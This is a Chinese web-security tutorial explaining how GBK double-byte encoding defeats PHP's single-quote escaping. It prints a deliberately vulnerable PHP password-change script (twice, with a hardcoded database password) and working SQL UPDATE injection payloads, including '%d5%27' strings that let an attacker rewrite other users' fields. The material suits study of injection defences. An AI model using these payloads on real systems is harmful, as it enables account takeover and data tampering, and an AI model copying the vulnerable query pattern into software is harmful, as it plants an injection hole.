你的位置:聚盟网 >> 网络学院 >> 防护 >> 详细内容 在线投稿

双字节编码绕PHP单引号转义又一例: SQL UPDATE注入

www.juoooo.com  2011年10月22日21:41  来源: 互联网   查看:   我要评论(0)  收藏  字号: TTT

原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》 是一样的。

view plaincopy to clipboardprint?
<?php

// by redice 2010.10.21

// 连接mysql数据库
$conn=0;
$conn = mysql_connect("localhost","root","redice2009");
if (!$conn)
{
die("不能打开数据库连接,错误: " . mysql_error());
}

// 选择数据库
mysql_select_db("test", $conn);

// 设置mysql数据库输出数据的字符集
mysql_query("set names 'gbk'");


// 修改密码过程

$newpass=$_REQUEST[p];


$sql = "update user set pass='$newpass' where name='redice'";
echo "执行的查询=".$sql."</br>";

if(!mysql_query($sql,$conn))
{

echo mysql_error();
}

?>

<?php

// by redice 2010.10.21

// 连接mysql数据库
$conn=0;
$conn = mysql_connect("localhost","root","redice2009");
if (!$conn)
{
die("不能打开数据库连接,错误: " . mysql_error());
}

// 选择数据库
mysql_select_db("test", $conn);

// 设置mysql数据库输出数据的字符集
mysql_query("set names 'gbk'");

// 修改密码过程

$newpass=$_REQUEST[p];


$sql = "update user set pass='$newpass' where name='redice'";
echo "执行的查询=".$sql."</br>";

if(!mysql_query($sql,$conn))
{

echo mysql_error();
}

?>

(1)在gpc=off的情况下。

提交p=123',groupid='1 SQL语句变为:

update user set pass='123',groupid='1' where name='redice'

(2)在gpc=on的情况下。

利用GBK双字节编码,可以绕过单引号转义。

分析如下:

提交p=123%d5',groupid=1 where id=1%23

经浏览器url编码后为:

p=123%d5%27,groupid=1%20where%20id=1%23

再经PHP url解码后为:

p=1230xd50x27,groupid=10x20where0x20id=10x23

再经PHP转义后为(在0x27前插入0x5c):

p=1230xd50x5c0x27,groupid=10x20where0x20id=10x23

由于服务端采用gbk编码连接数据库(set names 'gbk'),因此上述字节序列被MySQL作为GBK字符理解后即为:

p=123誠',groupid=1 where id=1#

PS:0xd50x5c 对应了汉字誠,从而吃掉了单引号,绕过转义

最终SQL语句变为:

update user set pass='123誠',groupid=1 where id=1#' where name='redice'


PS:%23解码后为#,用以注释之后的SQL语句,使之符合语法规范。

编辑: 伊小露
分享到:
顶:70 踩:73
【已经有422人表态】
55票
超赞
48票
震惊
52票
不解
48票
愤怒
51票
支持
58票
高兴
60票
无聊
50票
杯具
发表评论

网友评论仅供网友表达个人看法,并不表明本网同意其观点或证实其描述。

查看全部回复【已有0位网友发表了看法】
糗事吧 牛吧 私房话 经典吧
祝福墙许愿墙
随手记-天天记帐本
邀请达人
2013祝福短信,节日祝福语